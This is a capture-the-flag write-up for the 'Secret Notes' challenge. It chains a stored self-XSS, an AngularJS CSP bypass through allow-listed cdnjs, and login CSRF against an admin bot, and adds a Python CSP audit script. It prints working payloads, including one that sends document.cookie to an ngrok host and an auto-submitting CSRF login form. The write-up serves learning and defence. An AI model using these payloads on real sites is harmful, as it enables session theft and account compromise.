ClearSale CTF 2021

Secret Notes

Secret Notes was an XSS challenge built around a self-XSS that could be turned against the admin through CSRF; it was also necessary to bypass the CSP.


Approaching the app

The app has two main features. The first is a notepad you log in to; the note is tied to the account rather than to the browser, so whenever you log in as the same user you see the same note (this may sound obvious, but it's the catch here 😉).

It's possible to log in to the notepad using admin as both username and password. Once logged in we receive the following CSP header:

Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-eval' cdnjs.cloudflare.com maxcdn.bootstrapcdn.com; style-src maxcdn.bootstrapcdn.com 'self' 'unsafe-inline';

The app won't run simple XSS payloads such as <script>alert()</script>, but script-src allows anything hosted on cdnjs.cloudflare.com. That means we can, for example, load AngularJS from there and finally be able to run JavaScript, since 'unsafe-eval' is also allowed. There is a HackTricks article on CSP bypasses that makes this fairly easy to accomplish.
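To see why this policy is bypassable, here is a small added audit script (not part of the original writeup) that parses the header above and flags the script-src weaknesses the challenge relies on. The list of gadget-hosting CDNs and the hardened comparison policy are my own constructions.

```python
"""Audit a Content-Security-Policy header for the weaknesses abused in this
challenge: a script-src that allow-lists whole CDN hosts (AngularJS gadget),
'unsafe-eval'/'unsafe-inline', and the absence of a nonce or hash."""

# Header constructed from the one the challenge app returns.
CHALLENGE_CSP = (
    "default-src 'self'; script-src 'self' 'unsafe-eval' cdnjs.cloudflare.com "
    "maxcdn.bootstrapcdn.com; style-src maxcdn.bootstrapcdn.com 'self' 'unsafe-inline';"
)

# Hardened comparison policy (constructed): nonce-only scripts, no CDN hosts, no eval.
HARDENED_CSP = "default-src 'self'; script-src 'self' 'nonce-r4nd0mNonce'; style-src 'self'"

# Public CDNs known to host script-gadget libraries such as AngularJS (assumed list).
# Allow-listing the whole host lets an injection pull any library version from it.
GADGET_CDN_HOSTS = {
    "cdnjs.cloudflare.com", "maxcdn.bootstrapcdn.com",
    "ajax.googleapis.com", "cdn.jsdelivr.net", "unpkg.com",
}


def parse_csp(header: str) -> dict[str, list[str]]:
    """Split 'directive src src; directive ...' into a dict of source lists."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.strip().split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def audit_csp(header: str) -> list[str]:
    """Return one finding per script-execution weakness in the policy."""
    policy = parse_csp(header)
    # script-src falls back to default-src when it is absent.
    script_src = policy.get("script-src", policy.get("default-src", []))
    findings = []
    if "'unsafe-eval'" in script_src:
        findings.append("script-src allows 'unsafe-eval': $eval-style gadgets can run")
    if "'unsafe-inline'" in script_src:
        findings.append("script-src allows 'unsafe-inline': plain <script> injection runs")
    for src in script_src:
        # Reduce 'https://host/path' or 'host' to the bare host name.
        host = src.lower().split("://")[-1].split("/")[0]
        if host in GADGET_CDN_HOSTS:
            findings.append(f"script-src allow-lists whole CDN host {host}: gadget libraries load")
    if not any(s.startswith(("'nonce-", "'sha")) for s in script_src):
        findings.append("script-src has no nonce or hash: the host allow-list is the only control")
    return findings
```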

Running the following payload will pop an alert:

</textarea><script src="https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js"></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };alert("csp bypass ez af");//');}} </div>

The second feature of the app lets you submit a URL that the admin will browse to.

The app also has no CSRF protection at all. With all the info we've gathered, we can send the admin a URL hosting a CSRF page that submits a login form to the app with the same credentials we used; the admin is then logged into our account and lands on our stored self-XSS payload.

The exploit

We can exfiltrate the admin's cookies with a payload as follows:

</textarea><script src='https://cdnjs.cloudflare.com/ajax/libs/angular.js/1.4.6/angular.js'></script>
<div ng-app> {{'a'.constructor.prototype.charAt=[].join;$eval('x=1} } };location=`http://d3e1fcf03b4e.ngrok.io/?xss=`+btoa(document.cookie);//');}}</div>

We set location to a server we control and pass the cookies as a GET parameter; this is basic data exfiltration via XSS. After storing the XSS payload in the notepad, we just need to get the admin to log in. This can be done by serving the following HTML form, generated with Burp Suite (Engagement tools > Generate CSRF PoC):

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form id="form1" action="http://34.135.203.251/login" method="POST">
      <input type="hidden" name="username" value="admin" />
      <input type="hidden" name="password" value="admin" />
    </form>
    <script>
     document.getElementById("form1").submit();
    </script>
  </body>
</html>

Burp Suite generates a PoC that requires user interaction, but the added script submits the form automatically on page load. After sending the CSRF URL to the admin, a cookie hits our server.

After decoding the base64 data, we get the flag 😛